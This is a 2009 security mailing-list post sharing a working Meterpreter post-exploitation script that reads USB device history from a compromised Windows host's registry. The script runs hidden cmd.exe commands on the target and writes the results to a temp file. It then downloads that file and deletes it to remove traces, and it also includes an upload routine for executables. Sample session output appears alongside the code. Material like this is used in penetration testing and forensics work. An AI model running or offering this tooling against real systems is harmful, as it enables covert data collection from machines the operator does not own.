Here is a meterpreter script to pull the USB devices from the registry.
Few issues in saving the output to a text file on the target before
downloading it. think its the \n that i'm adding. If anyone has any tips I'm
all ears.
As well the output on the meterpreter screen will be
run installedusb
[*] New session on 192.168.0.50:43304...
[*] -- Files saved to C:\Documents and Settings\user\Application
Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964...
[*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
[*] Dumping software installed on pc per registry
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR...
[*]
========================================================================================================================
* Friendly Name : Apple iPod USB Device
- Class : DiskDrive
- DeviceDesc : Disk drive
- HardwareID :
USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk??
[*] -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
[*] -- C:\Documents and Settings\user\Application
Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt
downloaded!
[*] ...Done!!
[*] Completed processing on 192.168.0.50:43304...
[code]
#
# This is a Meterpreter script designed to be used by the Metasploit
Framework
#
# Meterpreter script for pulling forensics data from registry for any USB
device
# connected to system
#
# Provided by Dimitrios Kapsalis
# Verion: 0.1
require 'fileutils'
#
====================================================================================================================================
# Print message to file on target
#
====================================================================================================================================
def m_writetofile(session,file,message)
cmd = "cmd /c echo #{message} >> #{file}"
m_exec(session, cmd)
end
#
====================================================================================================================================
# Delete a file (meterpreter has no unlink API yet)
#
====================================================================================================================================
def m_unlink(session, path)
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil,
{'Hidden' => 'true'})
while(r.name)
select(nil, nil, nil, 0.10)
end
r.close
end
#
====================================================================================================================================
# Exec a command and return the results
#
====================================================================================================================================
def m_exec(session, cmd)
begin
r = session.sys.process.execute(cmd, nil, {'Hidden' => true,
'Channelized' => true})
b = ""
while(d = r.channel.read)
b << d
end
r.channel.close
r.close
b
rescue ::Exception => e
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
#
====================================================================================================================================
# Function to upload files
#
====================================================================================================================================
def m_upload(session,file)
location = session.fs.file.expand_path("%temp%")
fileontrgt = "#{location}\\#{rand(100)}.exe"
print_status("\t-- Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("\t-- #{file} uploaded!")
print_status("\t-- File on target #{fileontrgt}")
return fileontrgt
end
#
====================================================================================================================================
# Function to download files
#
====================================================================================================================================
def m_download(session,src,dst)
location = session.fs.file.expand_path("%temp%")
print_status("\t-- Downloading #{src}....")
session.fs.file.download_file("#{dst}","#{src}")
print_status("\t-- #{dst} downloaded!")
end
#
====================================================================================================================================
# Script proper
#
====================================================================================================================================
# The 'client' object holds the Meterpreter session
# Aliasing here for plugin compatibility
session = client
script_name = "installedsoftware"
# Extract the host and port
host,port = session.tunnel_peer.split(':')
print_status("New session on #{host}:#{port}...")
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs',script_name , host +
"_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) )
# Create the log directory
::FileUtils.mkdir_p(logs)
print_status("-- Files saved to #{logs}...")
location = session.fs.file.expand_path("%temp%")
filename = "#{rand(100)}.dat"
fileontrgt = "#{location}\\#{filename}"
print_status("-- Data logged to #{fileontrgt}....")
begin
#===============================================================================================================================
#===============================================================================================================================
#===============================================================================================================================
# Pull USB history Pull USB history Pull USB history Pull USB history
Pull USB history Pull USB history Pull USB history
#===============================================================================================================================
#===============================================================================================================================
#===============================================================================================================================
#===========================================================================================
# Dump USB device history
#===========================================================================================
key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
root_key, base_key = session.sys.registry.splitkey(key)
message =
"---------------------------------------------------------------------"
m_writetofile(session,fileontrgt,message)
message = "Dumping software installed on pc per registry #{key}... "
print_status(message)
m_writetofile(session,fileontrgt,message)
message =
"---------------------------------------------------------------------"
m_writetofile(session,fileontrgt,message)
session.sys.registry.create_key(root_key, base_key).each_key() do
|device|
puts device
# =========================================
# ...
# =========================================
session.sys.registry.create_key(root_key,
"#{base_key}\\#{device}").each_key() do |intermediate|
puts intermediate
rk = session.sys.registry.open_key(root_key,
"#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
cl = rk.query_value("class")
deviceDesc = rk.query_value("DeviceDesc")
friendlyName = rk.query_value("FriendlyName")
hardwareID = rk.query_value("HardwareID")
message = "
========================================================================================================================\n"
<<
" * Friendly Name : #{friendlyName.data}\n" <<
" - Class : #{cl.data}\n" <<
" - DeviceDesc : #{deviceDesc.data}\n" <<
" - HardwareID : #{hardwareID.data}\n"
print_status(message)
m_writetofile(session,fileontrgt,message)
end
end
#===========================================================================================
# download output file
#===========================================================================================
m_download(session, fileontrgt, "#{logs}\\installedusb.txt")
sleep(3)
#===========================================================================================
# delete exe from target system
#===========================================================================================
m_unlink(session, fileontrgt)
print_status("...Done!!")
rescue ::Exception => e
print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
print_status("Completed processing on #{host}:#{port}...")
[/code]
On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <[email protected]>wrote:
> The user assist keys are ROT13 encoded!
>
> There's just so much good stuff. Volume shadow copies and restore
> points too. And the list goes on...
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
